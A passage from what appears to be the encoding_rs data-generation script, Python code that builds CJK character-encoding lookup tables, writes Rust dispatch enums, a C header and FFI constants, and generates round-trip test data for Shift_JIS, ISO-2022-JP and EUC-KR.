range_triples.append(run_start_code_point)
run_start_pointer = 0
run_start_code_point = 0
previous_code_point = 0
in_run = False
else:
if code_point:
in_run = True
run_start_pointer = i
run_start_code_point = code_point
previous_code_point = code_point
if in_run:
range_triples.append(run_start_pointer)
range_triples.append(end - run_start_pointer)
range_triples.append(run_start_code_point)
run_start_pointer = 0
run_start_code_point = 0
previous_code_point = 0
in_run = False
if in_run:
raise Error()
static_u16_table("JIS0208_RANGE_TRIPLES", range_triples)
level1_kanji_index = index[1410:4375]
level1_kanji_pairs = []
for i in xrange(len(level1_kanji_index)):
pointer = 1410 + i
(lead, trail) = divmod(pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
level1_kanji_pairs.append((level1_kanji_index[i], (lead, trail)))
level1_kanji_pairs.sort(key=lambda x: x[0])
static_u16_table_from_indexable("JIS0208_LEVEL1_KANJI_CODE_POINTS", level1_kanji_pairs, 0, "kanji-encode")
static_u8_pair_table_from_indexable("JIS0208_LEVEL1_KANJI_SHIFT_JIS_BYTES", level1_kanji_pairs, 1, "kanji-encode")
kanji_bytes = [None] * (0x9FA1 - 0x4E00)
for pointer in xrange(len(index)):
code_point = index[pointer]
if code_point and code_point >= 0x4E00 and code_point <= 0x9FA0:
(lead, trail) = divmod(pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
if pointer >= 8272:
lead = lead & 0x7F
kanji_bytes[code_point - 0x4E00] = (lead, trail)
static_u8_pair_table("JIS0208_KANJI_BYTES", kanji_bytes, "fast-kanji-encode")
half_width_index = indexes["iso-2022-jp-katakana"]
data_file.write('''pub static ISO_2022_JP_HALF_WIDTH_TRAIL: [u8; %d] = [
''' % len(half_width_index))
for i in xrange(len(half_width_index)):
code_point = half_width_index[i]
pointer = index.index(code_point)
trail = pointer % 94 + 0x21
data_file.write('0x%02X,\n' % trail)
data_file.write('''];
''')
index = indexes["euc-kr"]
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x20):
for column in xrange(190):
i = column + (row * 190)
if (column >= 0x1A and column < 0x20) or (column >= 0x3A and column < 0x40):
continue
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
adjustment = 0
if column >= 0x40:
adjustment = 12
elif column >= 0x20:
adjustment = 6
pointers.append(column - adjustment + (row * (190 - 12)))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("CP949_TOP_HANGUL_POINTERS", pointers)
static_u16_table("CP949_TOP_HANGUL_OFFSETS", offsets)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x46 - 0x20):
for column in xrange(190 - 94):
i = 6080 + column + (row * 190)
if (column >= 0x1A and column < 0x20) or (column >= 0x3A and column < 0x40):
continue
if i > 13127:
break
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
adjustment = 0
if column >= 0x40:
adjustment = 12
elif column >= 0x20:
adjustment = 6
pointers.append(column - adjustment + (row * (190 - 94 - 12)))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("CP949_LEFT_HANGUL_POINTERS", pointers)
static_u16_table("CP949_LEFT_HANGUL_OFFSETS", offsets)
hangul_index = []
previous_code_point = 0
for row in xrange(0x48 - 0x2F):
for column in xrange(94):
code_point = index[9026 + column + (row * 190)]
if previous_code_point >= code_point:
raise Error()
hangul_index.append(code_point)
previous_code_point = code_point
static_u16_table("KSX1001_HANGUL", hangul_index)
hanja_index = []
for row in xrange(0x7D - 0x49):
for column in xrange(94):
hanja_index.append(index[13966 + column + (row * 190)])
static_u16_table("KSX1001_HANJA", hanja_index)
symbol_index = []
for i in range(6176, 6270):
symbol_index.append(index[i])
for i in range(6366, 6437):
symbol_index.append(index[i])
static_u16_table("KSX1001_SYMBOLS", symbol_index)
subindex = []
for i in range(7506, 7521):
subindex.append(null_to_zero(index[i]))
static_u16_table("KSX1001_UPPERCASE", subindex)
subindex = []
for i in range(7696, 7712):
subindex.append(index[i])
static_u16_table("KSX1001_LOWERCASE", subindex)
subindex = []
for i in range(7126, 7194):
subindex.append(index[i])
static_u16_table("KSX1001_BOX", subindex)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(10):
for column in xrange(94):
i = 6556 + column + (row * 190)
code_point = index[i]
if (i >= 6946 and i <= 6950):
code_point = i - 6946
elif (i >= 6961 and i <= 6967):
code_point = i - 6961
elif (i >= 6992 and i <= 6999):
code_point = i - 6992
elif (i >= 7024 and i <= 7029):
code_point = i - 7024
elif (i >= 7126 and i <= 7219):
code_point = i - 7126
elif (i >= 7395 and i <= 7409):
code_point = i - 7395
elif (i >= 7506 and i <= 7521):
code_point = i - 7506
elif (i >= 7696 and i <= 7711):
code_point = i - 7696
elif (i >= 7969 and i <= 7979):
code_point = i - 7969
elif (i >= 8162 and i <= 8169):
code_point = i - 8162
elif (i >= 8299 and i <= 8313):
code_point = i - 8299
elif (i >= 8347 and i <= 8359):
code_point = i - 8347
if code_point - previous_code_point != 1:
pointers.append(column + (row * 94))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("KSX1001_OTHER_POINTERS", pointers)
static_u16_table("KSX1001_OTHER_UNSORTED_OFFSETS", offsets[:-1])
hangul_bytes = [None] * (0xD7A4 - 0xAC00)
hanja_unified_bytes = [None] * (0x9F9D - 0x4E00)
hanja_compatibility_bytes = [None] * (0xFA0C - 0xF900)
for row in xrange(0x7D):
for column in xrange(190):
pointer = column + (row * 190)
code_point = index[pointer]
if code_point:
lead = 0x81 + row
trail = 0x41 + column
if code_point >= 0xAC00 and code_point < 0xD7A4:
hangul_bytes[code_point - 0xAC00] = (lead, trail)
elif code_point >= 0x4E00 and code_point < 0x9F9D:
hanja_unified_bytes[code_point - 0x4E00] = (lead, trail)
elif code_point >= 0xF900 and code_point < 0xFA0C:
hanja_compatibility_bytes[code_point - 0xF900] = (lead, trail)
static_u8_pair_table("CP949_HANGUL_BYTES", hangul_bytes, "fast-hangul-encode")
static_u8_pair_table("KSX1001_UNIFIED_HANJA_BYTES", hanja_unified_bytes, "fast-hanja-encode")
static_u8_pair_table("KSX1001_COMPATIBILITY_HANJA_BYTES", hanja_compatibility_bytes, "fast-hanja-encode")
index = indexes["jis0212"]
static_u16_table("JIS0212_KANJI", index[1410:7211])
symbol_index = []
symbol_triples = []
pointers_to_scan = [
(0, 596),
(608, 644),
(656, 1409),
]
in_run = False
run_start_pointer = 0
run_start_array_index = 0
for (start, end) in pointers_to_scan:
for i in range(start, end):
code_point = index[i]
if in_run:
if code_point:
symbol_index.append(code_point)
elif index[i + 1]:
symbol_index.append(0)
else:
symbol_triples.append(run_start_pointer)
symbol_triples.append(i - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
else:
if code_point:
in_run = True
run_start_pointer = i
run_start_array_index = len(symbol_index)
symbol_index.append(code_point)
if in_run:
symbol_triples.append(run_start_pointer)
symbol_triples.append(end - run_start_pointer)
symbol_triples.append(run_start_array_index)
in_run = False
if in_run:
raise Error()
static_u16_table("JIS0212_ACCENTED", symbol_index)
static_u16_table("JIS0212_ACCENTED_TRIPLES", symbol_triples)
index = indexes["gb18030"]
pointers = []
offsets = []
previous_code_point = 0
for i in xrange(6080):
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
pointers.append(i)
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("GBK_TOP_IDEOGRAPH_POINTERS", pointers)
static_u16_table("GBK_TOP_IDEOGRAPH_OFFSETS", offsets)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x7D - 0x29):
for column in xrange(190 - 94):
i = 7790 + column + (row * 190)
if i > 23650:
break
code_point = index[i]
if previous_code_point > code_point:
raise Error()
if code_point - previous_code_point != 1:
pointers.append(column + (row * (190 - 94)))
offsets.append(code_point)
previous_code_point = code_point
static_u16_table("GBK_LEFT_IDEOGRAPH_POINTERS", pointers)
static_u16_table("GBK_LEFT_IDEOGRAPH_OFFSETS", offsets)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(0x29 - 0x20):
for column in xrange(190 - 94):
i = 6080 + column + (row * 190)
code_point = index[i]
if code_point - previous_code_point != 1:
pointers.append(column + (row * (190 - 94)))
offsets.append(code_point)
previous_code_point = code_point
pointers.append((190 - 94) * (0x29 - 0x20))
static_u16_table("GBK_OTHER_POINTERS", pointers)
static_u16_table("GBK_OTHER_UNSORTED_OFFSETS", offsets)
bottom_index = []
for i in range(23651, 23656):
bottom_index.append(index[i])
for i in range(23750, 23846):
bottom_index.append(index[i])
static_u16_table("GBK_BOTTOM", bottom_index)
hanzi_index = []
for row in xrange(0x77 - 0x2F):
for column in xrange(94):
hanzi_index.append(index[9026 + column + (row * 190)])
static_u16_table("GB2312_HANZI", hanzi_index)
symbol_index = []
for i in xrange(94):
symbol_index.append(index[6176 + i])
static_u16_table("GB2312_SYMBOLS", symbol_index)
symbol_index = []
for i in xrange(22):
symbol_index.append(index[7189 + i])
static_u16_table("GB2312_SYMBOLS_AFTER_GREEK", symbol_index)
pinyin_index = []
for i in xrange(32):
pinyin_index.append(index[7506 + i])
static_u16_table("GB2312_PINYIN", pinyin_index)
pointers = []
offsets = []
previous_code_point = 0
for row in xrange(14):
for column in xrange(94):
i = 6366 + column + (row * 190)
code_point = index[i]
if (i >= 7189 and i < 7189 + 22):
code_point = i - 7189
elif (i >= 7506 and i < 7506 + 32):
code_point = i - 7506
if code_point - previous_code_point != 1:
pointers.append(column + (row * 94))
offsets.append(code_point)
previous_code_point = code_point
pointers.append(14 * 94)
static_u16_table("GB2312_OTHER_POINTERS", pointers)
static_u16_table("GB2312_OTHER_UNSORTED_OFFSETS", offsets)
pointers = []
offsets = []
for pair in indexes["gb18030-ranges"]:
if pair[1] == 0x10000:
break
pointers.append(pair[0])
offsets.append(pair[1])
static_u16_table("GB18030_RANGE_POINTERS", pointers)
static_u16_table("GB18030_RANGE_OFFSETS", offsets)
level1_hanzi_index = hanzi_index[:(94 * (0xD8 - 0xB0) - 5)]
level1_hanzi_pairs = []
for i in xrange(len(level1_hanzi_index)):
hanzi_lead = (i / 94) + 0xB0
hanzi_trail = (i % 94) + 0xA1
level1_hanzi_pairs.append((level1_hanzi_index[i], (hanzi_lead, hanzi_trail)))
level1_hanzi_pairs.sort(key=lambda x: x[0])
static_u16_table_from_indexable("GB2312_LEVEL1_HANZI_CODE_POINTS", level1_hanzi_pairs, 0, "gb-hanzi-encode")
static_u8_pair_table_from_indexable("GB2312_LEVEL1_HANZI_BYTES", level1_hanzi_pairs, 1, "gb-hanzi-encode")
hanzi_bytes = [None] * (0x9FA7 - 0x4E00)
for row in xrange(126):
for column in xrange(190):
pointer = column + (row * 190)
code_point = index[pointer]
if code_point and code_point >= 0x4E00 and code_point <= 0x9FA6:
hanzi_lead = 0x81 + row
hanzi_trail = column + (0x40 if column < 0x3F else 0x41)
hanzi_bytes[code_point - 0x4E00] = (hanzi_lead, hanzi_trail)
static_u8_pair_table("GBK_HANZI_BYTES", hanzi_bytes, "fast-gb-hanzi-encode")
data_file.write(data_rs_end)
data_file.close()
variant_file = open("src/variant.rs", "w")
variant_file.write('''// Copyright Mozilla Foundation. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// https://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or https://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// THIS IS A GENERATED FILE. PLEASE DO NOT EDIT.
// Instead, please regenerate using generate-encoding-data.py
//! This module provides enums that wrap the various decoders and encoders.
//! The purpose is to make `Decoder` and `Encoder` `Sized` by writing the
//! dispatch explicitly for a finite set of specialized decoders and encoders.
//! Unfortunately, this means the compiler doesn't generate the dispatch code
//! and it has to be written here instead.
//!
//! The purpose of making `Decoder` and `Encoder` `Sized` is to allow stack
//! allocation in Rust code, including the convenience methods on `Encoding`.
''')
encoding_variants = [u"single-byte",]
for encoding in multi_byte:
if encoding["name"] in [u"UTF-16LE", u"UTF-16BE"]:
continue
else:
encoding_variants.append(encoding["name"])
encoding_variants.append(u"UTF-16")
decoder_variants = []
for variant in encoding_variants:
if variant == u"GBK":
continue
decoder_variants.append(variant)
encoder_variants = []
for variant in encoding_variants:
if variant in [u"replacement", u"GBK", u"UTF-16"]:
continue
encoder_variants.append(variant)
for variant in decoder_variants:
variant_file.write("use %s::*;\n" % to_snake_name(variant))
variant_file.write('''use super::*;
pub enum VariantDecoder {
''')
for variant in decoder_variants:
variant_file.write(" %s(%sDecoder),\n" % (to_camel_name(variant), to_camel_name(variant)))
variant_file.write('''}
impl VariantDecoder {
''')
def write_variant_method(name, mut, arg_list, ret, variants, excludes, kind):
variant_file.write('''pub fn %s(&''' % name)
if mut:
variant_file.write('''mut ''')
variant_file.write('''self''')
for arg in arg_list:
variant_file.write(''', %s: %s''' % (arg[0], arg[1]))
variant_file.write(''')''')
if ret:
variant_file.write(''' -> %s''' % ret)
variant_file.write(''' {\nmatch *self {\n''')
for variant in variants:
variant_file.write('''Variant%s::%s(ref ''' % (kind, to_camel_name(variant)))
if mut:
variant_file.write('''mut ''')
if variant in excludes:
variant_file.write('''v) => (),''')
continue
variant_file.write('''v) => v.%s(''' % name)
first = True
for arg in arg_list:
if not first:
variant_file.write(''', ''')
first = False
variant_file.write(arg[0])
variant_file.write('''),\n''')
variant_file.write('''}\n}\n\n''')
write_variant_method("max_utf16_buffer_length", False, [("byte_length", "usize")], "Option<usize>", decoder_variants, [], "Decoder")
write_variant_method("max_utf8_buffer_length_without_replacement", False, [("byte_length", "usize")], "Option<usize>", decoder_variants, [], "Decoder")
write_variant_method("max_utf8_buffer_length", False, [("byte_length", "usize")], "Option<usize>", decoder_variants, [], "Decoder")
write_variant_method("decode_to_utf16_raw", True, [("src", "&[u8]"),
("dst", "&mut [u16]"),
("last", "bool")], "(DecoderResult, usize, usize)", decoder_variants, [], "Decoder")
write_variant_method("decode_to_utf8_raw", True, [("src", "&[u8]"),
("dst", "&mut [u8]"),
("last", "bool")], "(DecoderResult, usize, usize)", decoder_variants, [], "Decoder")
variant_file.write('''
pub fn latin1_byte_compatible_up_to(&self, buffer: &[u8]) -> Option<usize> {
match *self {
VariantDecoder::SingleByte(ref v) => {
return Some(v.latin1_byte_compatible_up_to(buffer));
}
VariantDecoder::Utf8(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::Gb18030(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::Big5(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::EucJp(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::Iso2022Jp(ref v) => {
if v.in_neutral_state() {
return Some(Encoding::iso_2022_jp_ascii_valid_up_to(buffer));
}
return None;
}
VariantDecoder::ShiftJis(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::EucKr(ref v) => {
if !v.in_neutral_state() {
return None;
}
}
VariantDecoder::UserDefined(_) => {}
VariantDecoder::Replacement(_) | VariantDecoder::Utf16(_) => {
return None;
}
};
Some(Encoding::ascii_valid_up_to(buffer))
}
}
pub enum VariantEncoder {
''')
for variant in encoder_variants:
variant_file.write(" %s(%sEncoder),\n" % (to_camel_name(variant), to_camel_name(variant)))
variant_file.write('''}
impl VariantEncoder {
pub fn has_pending_state(&self) -> bool {
match *self {
VariantEncoder::Iso2022Jp(ref v) => {
v.has_pending_state()
}
_ => false,
}
}
''')
write_variant_method("max_buffer_length_from_utf16_without_replacement", False, [("u16_length", "usize")], "Option<usize>", encoder_variants, [], "Encoder")
write_variant_method("max_buffer_length_from_utf8_without_replacement", False, [("byte_length", "usize")], "Option<usize>", encoder_variants, [], "Encoder")
write_variant_method("encode_from_utf16_raw", True, [("src", "&[u16]"),
("dst", "&mut [u8]"),
("last", "bool")], "(EncoderResult, usize, usize)", encoder_variants, [], "Encoder")
write_variant_method("encode_from_utf8_raw", True, [("src", "&str"),
("dst", "&mut [u8]"),
("last", "bool")], "(EncoderResult, usize, usize)", encoder_variants, [], "Encoder")
variant_file.write('''}
pub enum VariantEncoding {
SingleByte(&'static [u16; 128], u16, u8, u8),''')
for encoding in multi_byte:
variant_file.write("%s,\n" % to_camel_name(encoding["name"]))
variant_file.write('''}
impl VariantEncoding {
pub fn new_variant_decoder(&self) -> VariantDecoder {
match *self {
VariantEncoding::SingleByte(table, _, _, _) => SingleByteDecoder::new(table),
VariantEncoding::Utf8 => Utf8Decoder::new(),
VariantEncoding::Gbk | VariantEncoding::Gb18030 => Gb18030Decoder::new(),
VariantEncoding::Big5 => Big5Decoder::new(),
VariantEncoding::EucJp => EucJpDecoder::new(),
VariantEncoding::Iso2022Jp => Iso2022JpDecoder::new(),
VariantEncoding::ShiftJis => ShiftJisDecoder::new(),
VariantEncoding::EucKr => EucKrDecoder::new(),
VariantEncoding::Replacement => ReplacementDecoder::new(),
VariantEncoding::UserDefined => UserDefinedDecoder::new(),
VariantEncoding::Utf16Be => Utf16Decoder::new(true),
VariantEncoding::Utf16Le => Utf16Decoder::new(false),
}
}
pub fn new_encoder(&self, encoding: &'static Encoding) -> Encoder {
match *self {
VariantEncoding::SingleByte(table, run_bmp_offset, run_byte_offset, run_length) => SingleByteEncoder::new(encoding, table, run_bmp_offset, run_byte_offset, run_length),
VariantEncoding::Utf8 => Utf8Encoder::new(encoding),
VariantEncoding::Gbk => Gb18030Encoder::new(encoding, false),
VariantEncoding::Gb18030 => Gb18030Encoder::new(encoding, true),
VariantEncoding::Big5 => Big5Encoder::new(encoding),
VariantEncoding::EucJp => EucJpEncoder::new(encoding),
VariantEncoding::Iso2022Jp => Iso2022JpEncoder::new(encoding),
VariantEncoding::ShiftJis => ShiftJisEncoder::new(encoding),
VariantEncoding::EucKr => EucKrEncoder::new(encoding),
VariantEncoding::UserDefined => UserDefinedEncoder::new(encoding),
VariantEncoding::Utf16Be | VariantEncoding::Replacement |
VariantEncoding::Utf16Le => unreachable!(),
}
}
pub fn is_single_byte(&self) -> bool {
match *self {
VariantEncoding::SingleByte(_, _, _, _) | VariantEncoding::UserDefined => true,
_ => false,
}
}
}
''')
variant_file.close()
(ffi_rs_begin, ffi_rs_end) = read_non_generated("../encoding_c/src/lib.rs")
ffi_file = open("../encoding_c/src/lib.rs", "w")
ffi_file.write(ffi_rs_begin)
ffi_file.write("""
// Instead, please regenerate using generate-encoding-data.py
/// The minimum length of buffers that may be passed to `encoding_name()`.
pub const ENCODING_NAME_MAX_LENGTH: usize = %d; // %s
""" % (longest_name_length, longest_name))
for name in preferred:
ffi_file.write('''/// The %s encoding.
#[no_mangle]
pub static %s_ENCODING: ConstEncoding = ConstEncoding(&%s_INIT);
''' % (to_dom_name(name), to_constant_name(name), to_constant_name(name)))
ffi_file.write(ffi_rs_end)
ffi_file.close()
(single_byte_rs_begin, single_byte_rs_end) = read_non_generated("src/single_byte.rs")
single_byte_file = open("src/single_byte.rs", "w")
single_byte_file.write(single_byte_rs_begin)
single_byte_file.write("""
// Instead, please regenerate using generate-encoding-data.py
#[test]
fn test_single_byte_decode() {""")
idx = 0
for name in preferred:
if name == u"ISO-8859-8-I":
continue;
if is_single_byte(name):
single_byte_file.write("""
decode_single_byte(%s, &data::SINGLE_BYTE_DATA.%s);""" % (to_constant_name(name), to_snake_name(name)))
idx += 1
if idx == 2:
single_byte_file.write("""
if cfg!(miri) {
// Miri is too slow
return;
}""")
single_byte_file.write("""
}
#[test]
fn test_single_byte_encode() {""")
idx = 0
for name in preferred:
if name == u"ISO-8859-8-I":
continue;
if is_single_byte(name):
single_byte_file.write("""
encode_single_byte(%s, &data::SINGLE_BYTE_DATA.%s);""" % (to_constant_name(name), to_snake_name(name)))
idx += 1
if idx == 2:
single_byte_file.write("""
if cfg!(miri) {
// Miri is too slow
return;
}""")
single_byte_file.write("""
}
""")
single_byte_file.write(single_byte_rs_end)
single_byte_file.close()
static_file = open("../encoding_c/include/encoding_rs_statics.h", "w")
static_file.write("""// Copyright Mozilla Foundation. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// https://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or https://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// THIS IS A GENERATED FILE. PLEASE DO NOT EDIT.
// Instead, please regenerate using generate-encoding-data.py
// This file is not meant to be included directly. Instead, encoding_rs.h
// includes this file.
#ifndef encoding_rs_statics_h_
#define encoding_rs_statics_h_
#ifndef ENCODING_RS_ENCODING
#define ENCODING_RS_ENCODING Encoding
#ifndef __cplusplus
typedef struct Encoding_ Encoding;
#endif
#endif
#ifndef ENCODING_RS_NOT_NULL_CONST_ENCODING_PTR
#define ENCODING_RS_NOT_NULL_CONST_ENCODING_PTR const ENCODING_RS_ENCODING*
#endif
#ifndef ENCODING_RS_ENCODER
#define ENCODING_RS_ENCODER Encoder
#ifndef __cplusplus
typedef struct Encoder_ Encoder;
#endif
#endif
#ifndef ENCODING_RS_DECODER
#define ENCODING_RS_DECODER Decoder
#ifndef __cplusplus
typedef struct Decoder_ Decoder;
#endif
#endif
#define INPUT_EMPTY 0
#define OUTPUT_FULL 0xFFFFFFFF
// %s
#define ENCODING_NAME_MAX_LENGTH %d
""" % (longest_name, longest_name_length))
for name in preferred:
static_file.write('''/// The %s encoding.
extern ENCODING_RS_NOT_NULL_CONST_ENCODING_PTR const %s_ENCODING;
''' % (to_dom_name(name), to_constant_name(name)))
static_file.write("""#endif // encoding_rs_statics_h_
""")
static_file.close()
(utf_8_rs_begin, utf_8_rs_end) = read_non_generated("src/utf_8.rs")
utf_8_file = open("src/utf_8.rs", "w")
utf_8_file.write(utf_8_rs_begin)
utf_8_file.write("""
// Instead, please regenerate using generate-encoding-data.py
pub static UTF8_DATA: Utf8Data = Utf8Data {
table: [
""")
for i in range(256):
combined = (1 << 2)
if i < 0x80 or i > 0xBF:
combined |= (1 << 3)
if i < 0xA0 or i > 0xBF:
combined |= (1 << 4)
if i < 0x80 or i > 0x9F:
combined |= (1 << 5)
if i < 0x90 or i > 0xBF:
combined |= (1 << 6)
if i < 0x80 or i > 0x8F:
combined |= (1 << 7)
utf_8_file.write("%d," % combined)
for i in range(128, 256):
lane = (1 << 2)
if i >= 0xC2 and i <= 0xDF:
lane = (1 << 3)
elif i == 0xE0:
lane = (1 << 4)
elif i >= 0xE1 and i <= 0xEC:
lane = (1 << 3)
elif i == 0xED:
lane = (1 << 5)
elif i >= 0xEE and i <= 0xEF:
lane = (1 << 3)
elif i == 0xF0:
lane = (1 << 6)
elif i >= 0xF1 and i <= 0xF3:
lane = (1 << 3)
elif i == 0xF4:
lane = (1 << 7)
utf_8_file.write("%d," % lane)
utf_8_file.write("""
],
};
""")
utf_8_file.write(utf_8_rs_end)
utf_8_file.close()
TEST_HEADER = '''Any copyright to the test code below this comment is dedicated to the
Public Domain. http://creativecommons.org/publicdomain/zero/1.0/
This is a generated file. Please do not edit.
Instead, please regenerate using generate-encoding-data.py
'''
index = indexes["jis0208"]
jis0208_in_file = open("src/test_data/jis0208_in.txt", "w")
jis0208_in_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
(lead, trail) = divmod(pointer, 94)
lead += 0xA1
trail += 0xA1
jis0208_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
jis0208_in_file.close()
jis0208_in_ref_file = open("src/test_data/jis0208_in_ref.txt", "w")
jis0208_in_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
jis0208_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
jis0208_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
jis0208_in_ref_file.close()
jis0208_out_file = open("src/test_data/jis0208_out.txt", "w")
jis0208_out_ref_file = open("src/test_data/jis0208_out_ref.txt", "w")
jis0208_out_file.write(TEST_HEADER)
jis0208_out_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
revised_pointer = pointer
if revised_pointer == 8644 or (revised_pointer >= 1207 and revised_pointer < 1220):
revised_pointer = index.index(code_point)
(lead, trail) = divmod(revised_pointer, 94)
lead += 0xA1
trail += 0xA1
jis0208_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
jis0208_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
jis0208_out_file.close()
jis0208_out_ref_file.close()
shift_jis_in_file = open("src/test_data/shift_jis_in.txt", "w")
shift_jis_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
shift_jis_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
shift_jis_in_file.close()
shift_jis_in_ref_file = open("src/test_data/shift_jis_in_ref.txt", "w")
shift_jis_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = 0xE000 - 8836 + pointer if pointer >= 8836 and pointer <= 10715 else index[pointer]
if code_point:
shift_jis_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 188
trail += 0x40 if trail < 0x3F else 0x41
if trail < 0x80:
shift_jis_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
shift_jis_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
shift_jis_in_ref_file.close()
shift_jis_out_file = open("src/test_data/shift_jis_out.txt", "w")
shift_jis_out_ref_file = open("src/test_data/shift_jis_out_ref.txt", "w")
shift_jis_out_file.write(TEST_HEADER)
shift_jis_out_ref_file.write(TEST_HEADER)
for pointer in range(0, 8272):
code_point = index[pointer]
if code_point:
revised_pointer = pointer
if revised_pointer >= 1207 and revised_pointer < 1220:
revised_pointer = index.index(code_point)
(lead, trail) = divmod(revised_pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
shift_jis_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
shift_jis_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
for pointer in range(8836, len(index)):
code_point = index[pointer]
if code_point:
revised_pointer = index.index(code_point)
if revised_pointer >= 8272 and revised_pointer < 8836:
revised_pointer = pointer
(lead, trail) = divmod(revised_pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
shift_jis_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
shift_jis_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
shift_jis_out_file.close()
shift_jis_out_ref_file.close()
iso_2022_jp_in_file = open("src/test_data/iso_2022_jp_in.txt", "w")
iso_2022_jp_in_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
(lead, trail) = divmod(pointer, 94)
lead += 0x21
trail += 0x21
iso_2022_jp_in_file.write("\x1B$B%s%s\x1B(B\n" % (chr(lead), chr(trail)))
iso_2022_jp_in_file.close()
iso_2022_jp_in_ref_file = open("src/test_data/iso_2022_jp_in_ref.txt", "w")
iso_2022_jp_in_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
iso_2022_jp_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
iso_2022_jp_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
iso_2022_jp_in_ref_file.close()
iso_2022_jp_out_file = open("src/test_data/iso_2022_jp_out.txt", "w")
iso_2022_jp_out_ref_file = open("src/test_data/iso_2022_jp_out_ref.txt", "w")
iso_2022_jp_out_file.write(TEST_HEADER)
iso_2022_jp_out_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
revised_pointer = pointer
if revised_pointer == 8644 or (revised_pointer >= 1207 and revised_pointer < 1220):
revised_pointer = index.index(code_point)
(lead, trail) = divmod(revised_pointer, 94)
lead += 0x21
trail += 0x21
iso_2022_jp_out_ref_file.write("\x1B$B%s%s\x1B(B\n" % (chr(lead), chr(trail)))
iso_2022_jp_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
for i in xrange(len(half_width_index)):
code_point = i + 0xFF61
normalized_code_point = half_width_index[i]
pointer = index.index(normalized_code_point)
(lead, trail) = divmod(pointer, 94)
lead += 0x21
trail += 0x21
iso_2022_jp_out_ref_file.write("\x1B$B%s%s\x1B(B\n" % (chr(lead), chr(trail)))
iso_2022_jp_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
iso_2022_jp_out_file.close()
iso_2022_jp_out_ref_file.close()
index = indexes["euc-kr"]
euc_kr_in_file = open("src/test_data/euc_kr_in.txt", "w")
euc_kr_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x41
euc_kr_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
euc_kr_in_file.close()
euc_kr_in_ref_file = open("src/test_data/euc_kr_in_ref.txt", "w")
euc_kr_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
euc_kr_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 190
trail += 0x41
if trail < 0x80:
euc_kr_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
euc_kr_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
euc_kr_in_ref_file.close()
euc_kr_out_file = open("src/test_data/euc_kr_out.txt", "w")
